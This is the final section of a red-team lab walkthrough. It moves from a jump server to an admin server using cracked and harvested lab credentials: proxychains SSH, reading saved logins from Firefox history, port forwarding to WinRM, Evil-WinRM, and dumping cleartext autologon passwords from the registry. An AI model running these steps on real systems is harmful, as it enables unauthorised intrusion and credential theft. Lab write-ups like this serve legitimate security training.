22/tcp  open   ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
23/tcp  closed telnet
25/tcp  closed smtp
80/tcp  closed http
110/tcp closed pop3

<..SNIP..>

An SSH server is running on TCP port 22. As the ‘jump-srv.mgmt.corp’ machine is managed by
“jump-admin”, we can try to SSH to the ‘10.10.3.3’ machine using the Jump-Admin domain user.

Perform SSH to 10.10.3.3 as the jump-admin domain user:

proxychains ssh -l jump-admin@MGMT.CORP 10.10.3.3

NOTE: enter the cracked jump-admin password ‘B@DB!tch’

We successfully SSHed to Jump-SRV.mgmt.corp as the “jump-admin” domain user.

Let’s also extract the Firefox bookmark URLs on this machine and look whether any interesting information can
be found (as the jump-admin user).

As the ‘jump-admin’ domain user:

cd ~/.mozilla/firefox/2s3p6m1v.default-release
sqlite3 places.sqlite

Inside SQLite:

.tables
select moz_places.url from moz_places;
.quit

Found URL: https://admin-sys.site/login.asp?user=sys-admin&pass=Rand0mlyS3l3ctedP@ss

However, using Firefox with proxychains to query the login URL shows that it is non-existent. Now
enumerate the IP address of the admin-sys server by pinging the hostname.

ping admin-sys.site

Discovered IP address: [192.168.1.2]

Performing a TCP port scan against the “192.168.1.2” target reveals that port 5985 is open,
which means PowerShell Remoting (WinRM) is possible.

6 Admin-SYS

In order to perform PowerShell Remoting, we need to apply some port forwarding.

Exit the SSH session and re-establish a new session with port forwarding switches.

Using port forwarding, we specify that all traffic sent to the local port will be forwarded to the
‘admin-sys’ server [192.168.1.2].

On a new bash session:

proxychains ssh -l jump-admin@MGMT.CORP 10.10.3.3 -L 5985:192.168.1.2:5985

(At this point, traffic from your attacker machine can reach the admin-sys machine.)

Use Evil-WinRM to connect to the 192.168.1.2 machine with the discovered credentials:

./evil-winrm.rb -i 127.0.0.1 -u sys-admin -p Rand0mlyS3l3ctedP@ss

Enumerating the environment reveals that “sys-admin” is a local user on the admin-sys server.
Privilege escalation can be done by querying the autologon registry keys.

Clear-text credentials of Administrator are found.

On the recently established WinRM session:

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

<..SNIP..>

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background          REG_SZ       0 0 0
    CachedLogonsCount   REG_SZ       10
    DebugServerCommand  REG_SZ       no
    DefaultUserName     REG_SZ       Administrator
    DefaultDomainName   REG_SZ       WIN-10-PRO-X64
    AutoAdminLogon      REG_SZ       1
    DefaultPassword     REG_SZ       Test@123

<..SNIP..>

Reconnect to the ‘admin-sys’ server with the local administrator credentials.

./evil-winrm.rb -i 127.0.0.1 -u Administrator -p Test@123

type C:\Users\Administrator\Desktop\Triumph.txt

<Result>

CONGRATULATIONS, YOU HAVE SUCCESSFULLY COMPROMISED MULTI-FOREST RED TEAM ENVIRONMENT!!

<3

</Result>

Congratulations!!

The Multi-Forest Red Team Environment is successfully compromised.

